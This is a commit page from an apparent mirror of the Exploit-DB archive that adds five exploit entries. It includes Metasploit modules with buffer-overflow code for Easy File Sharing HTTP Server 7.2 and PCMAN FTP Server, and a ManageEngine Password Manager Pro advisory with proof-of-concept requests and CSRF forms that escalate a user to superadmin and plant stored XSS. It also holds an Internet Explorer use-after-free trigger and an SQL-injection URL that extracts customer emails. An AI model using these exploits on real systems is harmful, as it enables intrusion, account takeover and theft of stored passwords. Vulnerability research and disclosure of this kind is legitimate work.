bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-04-06

Browse source 
5 new exploits

Easy File Sharing HTTP Server 7.2 SEH Overflow
PCMAN FTP Server Buffer Overflow - PUT Command
Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)
ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities
Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)
This commit is contained in:
Offensive Security 2016-04-06 05:04:31 +00:00
parent 13d072b592
commit 60fd0ef490
7 changed files with 599 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -15218,6 +15218,8 @@ id,file,description,date,author,platform,type,port
17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",2011-07-07,metasploit,windows,local,0
17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0
17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0
39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 SEH Overflow",2016-04-05,metasploit,windows,remote,80
39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command",2016-04-05,metasploit,windows,remote,21
17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0
17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0
17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0
@ -35883,3 +35885,6 @@ id,file,description,date,author,platform,type,port
39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272
39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0

Can't render this file because it is too large.

388
platforms/jsp/webapps/39664.txt Executable file
View file

@ -0,0 +1,388 @@
[Systems Affected]
Product : ManageEngine Password Manager Pro
Company : ZOHO Corp.
Build Number : 8.1 to 8.3 and probably earlier versions
Affected Versions : 8102 to 8302 and probably earlier versions
[Product Description]
Password Manager Pro is a secure vault for storing and managing
shared sensitive information such as passwords, documents and digital
identities of enterprises.
[Vulnerabilities]
Multiple vulnerabilities were identified within this application:
1- Stored XSS in /AddMail.ve
2- Privilege escalation in /EditUser.do
3- Business Login Bypass in /EditUser.do
4- Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
5- Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
6- Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp
7- Password Bruteforce for resources accounts in
/jsp/xmlhttp/AjaxResponse.jsp
8- Cross-Site Request Forgery
[Advisory Timeline]
17/07/2015 - Discovery and vendor notification
17/07/2015 - ManageEngine responsed that they will notify their
development team
13/10/2015 - ManageEngine informed that they have fixed these issue
14/10/2015 - Fixed Password Manager Pro build version 8300 has been released
15/10/2015 - Test on Beta build version 8300 was performed and
confirm the fix of these issues 2, 4, 7 and part of issue 8
02/11/2015 - ManageEngine ask more time to fix the remaining issues
before making this public
29/12/2015 - ManageEngine contacted for an update - No reply
12/01/2016 - ManageEngine contacted for an update - No reply
08/02/2016 - ManageEngine contacted for an update - small update provided
12/02/2016 - Last communication from ManageEngine
04/04/2016 - Public Disclosure
[Patch Available]
Password Manager Pro Release 8.3 (8300) (Released on October, 2015)
fix issues #2, #4, #7 and partially #8
Password Manager Pro Release 8.3 (8303) (Released on December 2015)
fix issues #1, #3, #5 and #6
[Exploit]
There is an exploit available that takes advantage of the Privilege
Escalation vulnerability (Issue #2) and elevates a regular user to
SuperAdmin, and then downloads the passwords and files stored within
the application. The exploit code is available here
- https://github.com/s3bap3/pmp-exploit
[Description of Vulnerabilities]
(1) Stored XSS in /AddMail.ve.
This functionality is under the personal accounts stored in the
application. However, as the page is also vulnerable to CSRF, an html
form can be forged to create a personal account an exploit the XSS
vulnerability. The affected parameter is "password", and the POST
message to send is something like this
[PoC]
POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1
service=1&serviceurl=1&loginname=1&password=<!--+--+--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&spassword=&tags=1&Rule=Low&FORWARDURL=MailAccount.cc%3F
(2) Privilege escalation in /EditUser.do that allows to do 2 things.
a- Hijack user's sessions by changing their emails and accessing
the forgot password functionality.
The affected parameter is "EMAIL" from the /EditUser.do web page.
Any user (even PASSWORD USER's role) could send a craft POST method
like the one below in order to change the user email address, which is
being used to generate a new user password when the previous one was
forgotten. The only attribute that needs to be changed from one
request to another is the LOGINID, which is a sequence number that
represent the User numeric ID.
b- Escalate privileges by changing the user account status from
Password user to superadmin.
By forging a similar request it is possible to raise our own
privileged to become a privileged user. For example, the parameter
"ROLE" can be changed to "Password Auditor" "Password Administrator"
or even "Administrator " and become it. It is also possible to become
a superAdmin by changing the parameter "superAdmin" from false to
true. This will allow us to take control of the application and all
the passwords stored on it. In order to become superAdmin, the user
role needs to be Administrator. Both can be achieved by forging the
same request. In this scenario there are two parameters to be aware
of.
- USERID and LOGINID is the numeric account id to which the
superadmin attribute will be granted (could be obtained from the login
reply)
- USER is the username to which the superadmin attribute will be granted
[PoC]
POST /EditUser.do?SUBREQUEST=true HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------20780287114832
-----------------------------20780287114832
Content-Disposition: form-data; name="isloginusersa"
false
-----------------------------20780287114832
Content-Disposition: form-data; name="superadminscope"
true
-----------------------------20780287114832
Content-Disposition: form-data; name="SERVERPORT"
7272
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDROLE"
Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="USERID"
4
-----------------------------20780287114832
Content-Disposition: form-data; name="LOGINID"
4
-----------------------------20780287114832
Content-Disposition: form-data; name="USER"
username
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDLANG"
en
-----------------------------20780287114832
Content-Disposition: form-data; name="EMAIL"
pwned@user.com
-----------------------------20780287114832
Content-Disposition: form-data; name="ROLE"
Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="superAdmin"
true
-----------------------------20780287114832
Content-Disposition: form-data; name="Rule"
Strong
-----------------------------20780287114832
Content-Disposition: form-data; name="DEPT"
-----------------------------20780287114832
Content-Disposition: form-data; name="LOCATION"
-----------------------------20780287114832
Content-Disposition: form-data; name="mobileaccess"
enable
-----------------------------20780287114832
Content-Disposition: form-data; name="UserCert"; filename=""
Content-Type: application/octet-stream
-----------------------------20780287114832
Content-Disposition: form-data; name="lang_code"
en
-----------------------------20780287114832--
(3) Business Login Bypass in /EditUser.do
The application allows only the creation of certain amount of
Administrator, based on the licences. However it is possible to create
more administrators. In order to exploit this go to the user
administration page, and edit a user id. Save the edition without
making any modification and intercept that POST message. Modify both
parameters, "OLDROLE" and "ROLE" with the role "Administrator", and
the user role will be changed to this one. Every user can be converted
to an administrator even if the license does not allow that much. The
application only check the amount of administrators when "ROLE" is
Administrator but "OLDROLE" is another one.
(4) Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
Every time a password for a user account or resource's user account
is being changed, a request is sent to this path in order to validate
the password against the password policy. Despite the fact the the
password is being sent in the URL (this means it could be logged in
any proxy or even in the browser), the policy against the password is
being evaluated could by changed by modifying the parameter "Rule"
from the value it currently has to "Low", in order to be evaluated
with a lower policy. For example:
[PoC]
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&ACCID=5
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&AccName=5
(5) Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
When an administrator creates a Password Reset Listener, another
administrator needs to approve it. The same happens when a Listener
needs to be suspended. However this could be bypassed by creating and
approving the listener by the same administrator. This could be
achieved by forging a GET request like the following. The only
parameter that needs to be changed is the "LISTENERID" which is a
sequence number that represents the Listener.
[PoC]
Listener Approval
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=false&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
Listener Suspension
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=true&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
(6) Resource's users enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp.
It is possible to enumerate resource's user accounts by forging a
GET request as follows. This URL allows, if a user has access, to
retrieve the account password. However if a user does not have access,
the error message changes if the user exists or not. The only
parameters that needs to be modified are "Resource" and "Account".
[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp?RequestType=PasswordRetrived&resource=admin+resource&account=admin
The error messages identifies if the account exists for that resource.
Account exists: ____ACCESS___DENIED__
Resource/Account does not exists: FAILURE
(7) Password Bruteforce for resources accounts in /jsp/xmlhttp/AjaxResponse.jsp
It is possible to enumerate resource's user passwords by forging a
GET request as follows. This URL is used in order to validate a user
password against the password policy specified. By being able to
change the password policy it is possible to use the "Low" policy
which does not allow to reuse the password that is currently setup for
the user. If an error message that the password could not be reused
appears, that indicate that the password is the current password for
that account.
The only parameters that needs to be modified are "Password" and
"ACCID", and ensure that the password policy "Rule" parameter is set
to low.
[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=2&Rule=Low&ACCID=8
The error messages identifies if the password is correct or not
for every user account.
Password matches: "Password cannot be same as last 1 passwords"
Password does not match: "SUCCESS"
Account ID does not exists: "Error in validating password policy"
(8) Cross-Site Request Forgery
The application is vulnerable to Cross-Site Request Forgery, which
by sending specific POST messages it is possible create a user in the
system (1), elevate privileges for a user (2)(4), and store a XSS in
the user's personal passwords (3). Below are two PoC
[PoC]
User Creation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/AddUser.do"
enctype="multipart/form-data">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="hacker" name="fname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="lname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="user" type="hidden"><input
value="true" type="hidden">
<input value="same" name="rbutton" type="hidden"><input
value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="spassword" type="hidden"><input
value="true" type="hidden">
<input value="hacker@hacker.com" name="mail"
type="hidden"><input value="true" type="hidden">
<input value="Password User" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="false" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="" name="dept" type="hidden"><input
value="true" type="hidden">
<input value="false" name="location"
type="hidden"><input value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>
Privilege Escalation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/EditUser.do?SUBREQUEST=true"
enctype="multipart/form-data">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="OLDROLE"
type="hidden"><input value="true" type="hidden">
<input value="613" name="USERID" type="hidden"><input
value="true" type="hidden">
<input value="613" name="LOGINID" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="USER" type="hidden"><input
value="true" type="hidden">
<input value="en" name="OLDLANG" type="hidden"><input
value="true" type="hidden">
<input value="hacker@hacker.com" name="EMAIL"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="DEPT" type="hidden"><input
value="true" type="hidden">
<input value="" name="LOCATION" type="hidden"><input
value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>
Stored XSS
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/AddMail.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="service" value="1" />
<input type="hidden" name="serviceurl" value="1" />
<input type="hidden" name="loginname" value="1" />
<input type="hidden" name="password" value="<!-- --
--><script>alert('XSS');</script><!-- -- -->" />
<input type="hidden" name="spassword" value="" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="Rule" value="Low" />
<input type="submit" value="Submit">
</form>
</body>
</html>
Privilege Escalation
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/ChangeRoles.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="SKIP_PREF" value="true" />
<input type="hidden" name="Admin" value="hacker" />
<input type="hidden" name="FORWARDURL"
value="UserTabView.cc%3F" />
<input type="submit" value="Submit">
</form>
</body>
</html>
--
S3ba
@s3bap3
http://linkedin.com/in/s3bap3

6
platforms/php/webapps/17327.txt
View file

@ -13,15 +13,15 @@
------------------------------------------------------------------------
vulnerable url:
/templates1/view_product.php?product=3D
/templates1/view_product.php?product=
Example:
http://localhost/templates1/view_product.php?product=3D[SQL INJECTION]
http://localhost/templates1/view_product.php?product=[SQL INJECTION]
Get an Mail from the Customers Table:
http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL=
http://localhost/templates1/view_product.php?product=94746%20AND%20%28SEL=
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=

42
platforms/windows/dos/39663.html Executable file
View file

@ -0,0 +1,42 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=691
Minimized PoC:
-->
<svg xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink">
<pattern id="outer"><rect id="rect"><pattern id="inner"></pattern></rect></pattern>
<script><![CDATA[
function handler() {
inner.setAttribute("viewBox");
}
outer.addEventListener("DOMAttrModified", function () { handler(); });
doc = document.implementation.createDocument("", "", null);
doc.adoptNode(rect.attributes[0]);
]]></script>
</svg>
<!--
Backtrace for reference:
2:052:x86> k 10
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0bb14b64 6ad180b8 vrfcore!VerifierStopMessageEx+0x571
0bb14b88 67fec434 vrfcore!VerifierDisableVerifier+0x748
0bb14bdc 67fea3dc verifier_67fe0000!VerifierStopMessage+0x74
0bb14c40 67fe733d verifier_67fe0000!AVrfpDphReportCorruptedBlock+0x10c
0bb14ca4 67fe7495 verifier_67fe0000!AVrfpDphFindBusyMemoryNoCheck+0x7d
0bb14cc8 67feb651 verifier_67fe0000!AVrfpDphFindBusyMemory+0x15
0bb14ce0 67ff0b12 verifier_67fe0000!AvrfpDphCheckPageHeapAllocation+0x41
0bb14cf0 67f93246 verifier_67fe0000!VerifierCheckPageHeapAllocation+0x12
0bb14d4c 60dca53f vfbasics+0x13246
0bb14d68 604cce4e MSHTML!MemoryProtection::HeapFree+0x46
0bb14d70 60b07866 MSHTML!ProcessHeapFree+0x10
0bb14d88 60baac6b MSHTML!CSVGHelpers::SetAttributeStringAndPointer<CRectF,CSVGRe
ct>+0xb6
0bb14de8 60e18b69 MSHTML!PROPERTYDESC::HandleStringProperty+0x110
0bb14e14 607e30e6 MSHTML!PROPERTYDESC::CallHandler+0x855996
0bb14e54 60b83323 MSHTML!CElement::SetAttributeFromPropDesc+0xbe
0bb14ee4 607e2f44 MSHTML!CElement::ie9_setAttributeNSInternal+0x2ee
-->
Side by side

After

Width:  |  Height:  |  Size: 1.7 KiB

11
platforms/windows/local/39666.txt Executable file
View file

@ -0,0 +1,11 @@
Sources:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
https://github.com/sam-b/CVE-2014-4113
EDB Mirror: https://www.exploit-db.com/docs/39665.pdf
Trigger and exploit code for CVE-2014-4113:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip

70
platforms/windows/remote/39661.rb Executable file
View file

@ -0,0 +1,70 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',
'Description' => %q{
This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.
},
'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '39008' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 390,
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],
],
'DefaultOptions' => {
'RPORT' => 80
},
'DisclosureDate' => 'Dec 2 2015',
'DefaultTarget' => 0))
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def exploit
connect
print_status("Sending exploit...")
sploit = "GET "
sploit << rand_text_alpha_upper(4061)
sploit << generate_seh_record(target.ret)
sploit << make_nops(19)
sploit << payload.encoded
sploit << make_nops(7)
sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)
sploit << " HTTP/1.0\r\n\r\n"
sock.put(sploit)
print_good("Exploit Sent")
handler
disconnect
end
end

80
platforms/windows/remote/39662.rb Executable file
View file

@ -0,0 +1,80 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in the PUT command of the
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
credientials are enabled.
},
'Author' =>
[
'Jay Turla', # Initial Discovery -- @shipcod3
'Chris Higgins' # msf Module -- @ch1gg1ns
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '37731'],
[ 'OSVDB', '94624']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0A\x0D",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 English',
{
'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
'Offset' => 2007
}
],
],
'DisclosureDate' => 'Aug 07 2015',
'DefaultTarget' => 0))
end
def check
connect_login
disconnect
if /220 PCMan's FTP Server 2\.0/ === banner
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
connect_login
print_status('Generating payload...')
sploit = rand_text_alpha(target['Offset'])
sploit << [target.ret].pack('V')
sploit << make_nops(16)
sploit << payload.encoded
send_cmd( ["PUT", sploit], false )
disconnect
end
end